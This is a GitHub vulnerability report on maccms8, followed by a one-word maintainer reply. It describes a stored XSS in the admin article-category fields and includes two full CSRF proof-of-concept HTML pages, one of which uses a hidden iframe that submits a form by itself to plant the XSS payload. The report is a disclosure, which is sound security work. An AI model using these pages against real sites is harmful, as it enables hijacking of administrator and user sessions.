### ISSUE TITLE
There are CSRF and XSS vulnerabilities in the background, which can be combined to steal user cookies and administrator cookies

### ISSUE THREAD

**Issue by Trepverterless** [magicblack/maccms8#2]
# xss
XSS vulnerability exists in the background administrator article management office when adding and modifying
Where Chinese and English names are entered, enter
`" onmousemove=alert(document.cookie) src=x`，Following chart
![1](https://user-images.githubusercontent.com/32705816/67657905-11768700-f993-11e9-96a5-02723fb74847.png)
Move the mouse over the label in the background article management area and the administrator cookie will pop up, as shown in the following figure
![2](https://user-images.githubusercontent.com/32705816/67657956-3f5bcb80-f993-11e9-9b00-1888d9e57bc6.png)
User cookies will also pop up when the front page mouse moves over the title
![3](https://user-images.githubusercontent.com/32705816/67658116-a37e8f80-f993-11e9-9d0f-df6ce6227cac.png)

****
# csrf
It is found that CSRF exists at the same time of adding and modifying
Before use
![4](https://user-images.githubusercontent.com/32705816/67658377-6070ec00-f994-11e9-813d-55539e345c6e.png)
When the following page is constructed, the administrator can be induced to click
```html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/maccms8/safetest/admin_data.php?ac=save&tab=art_type" method="POST">
      <input type="hidden" name="t&#95;id" value="" />
      <input type="hidden" name="flag" value="add" />
      <input type="hidden" name="backurl" value="http&#58;&#47;&#47;localhost&#47;maccms8&#47;safetest&#47;index&#46;php&#63;m&#61;art&#45;type" />
      <input type="hidden" name="t&#95;pid" value="0" />
      <input type="hidden" name="t&#95;name" value="test&quot;&#32;onmousemove&#61;alert&#40;document&#46;cookie&#41;&#32;src&#61;x" />
      <input type="hidden" name="t&#95;enname" value="test&quot;&#32;onmousemove&#61;alert&#40;document&#46;cookie&#41;&#32;src&#61;x" />
      <input type="hidden" name="t&#95;tpl" value="art&#95;type&#46;html" />
      <input type="hidden" name="t&#95;tpl&#95;list" value="art&#95;list&#46;html" />
      <input type="hidden" name="t&#95;tpl&#95;art" value="art&#95;detail&#46;html" />
      <input type="hidden" name="t&#95;key" value="" />
      <input type="hidden" name="t&#95;des" value="" />
      <input type="hidden" name="t&#95;title" value="" />
      <input type="hidden" name="t&#95;sort" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

```
When the administrator visits the click Page
![image](https://user-images.githubusercontent.com/32705816/67662589-aa5ecf80-f99e-11e9-80ed-eb4bb22628e1.png)

Category added successfully
![image](https://user-images.githubusercontent.com/32705816/67662704-e003b880-f99e-11e9-8daa-594885685d7b.png)

****
# csrf+xss
Here, CSRF and XSS can be used together, and attackers can use CSRF vulnerability to add or fix code brought in by articles，
```html
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Welcome to CSRF</title>
</head>
<p style="color:blue; text-align:center; font-size:60px;">Your're by CSRF</p>
<body>
<iframe hidden width=1000 heigth=100 src="#" srcdoc='
<form action="http://localhost/maccms8/safetest/admin_data.php?ac=save&tab=art_type" method="POST" name="form">
      <input type="hidden" name="t&#95;id" value="" />
      <input type="hidden" name="flag" value="add" />
      <input type="hidden" name="backurl" value="http&#58;&#47;&#47;localhost&#47;maccms8&#47;safetest&#47;index&#46;php&#63;m&#61;art&#45;type" />
      <input type="hidden" name="t&#95;pid" value="0" />
      <input type="hidden" name="t&#95;name" value="test&quot;&#32;onmousemove&#61;alert&#40;document&#46;cookie&#41;&#32;src&#61;x" />
      <input type="hidden" name="t&#95;enname" value="test&quot;&#32;onmousemove&#61;alert&#40;document&#46;cookie&#41;&#32;src&#61;x" />
      <input type="hidden" name="t&#95;tpl" value="art&#95;type&#46;html" />
      <input type="hidden" name="t&#95;tpl&#95;list" value="art&#95;list&#46;html" />
      <input type="hidden" name="t&#95;tpl&#95;art" value="art&#95;detail&#46;html" />
      <input type="hidden" name="t&#95;key" value="" />
      <input type="hidden" name="t&#95;des" value="" />
      <input type="hidden" name="t&#95;title" value="" />
      <input type="hidden" name="t&#95;sort" value="" />
      <input type="submit" value="Submit request" />
    </form>
<script>
//Automatic submission
document.form.submit();
</script>
'></iframe>
</body>
</html>
```
After the user accesses the link, the hidden iframe automatically submits the form and successfully adds the article classification with malicious code without the user's knowledge. Malicious code can send the user's cookie to the attacker's remote server and steal the user's cookie or administrator's cookie.
![image](https://user-images.githubusercontent.com/32705816/67662898-3ffa5f00-f99f-11e9-8b5e-9cf500c95374.png)

**Comment by magicblack** [comment]
good!
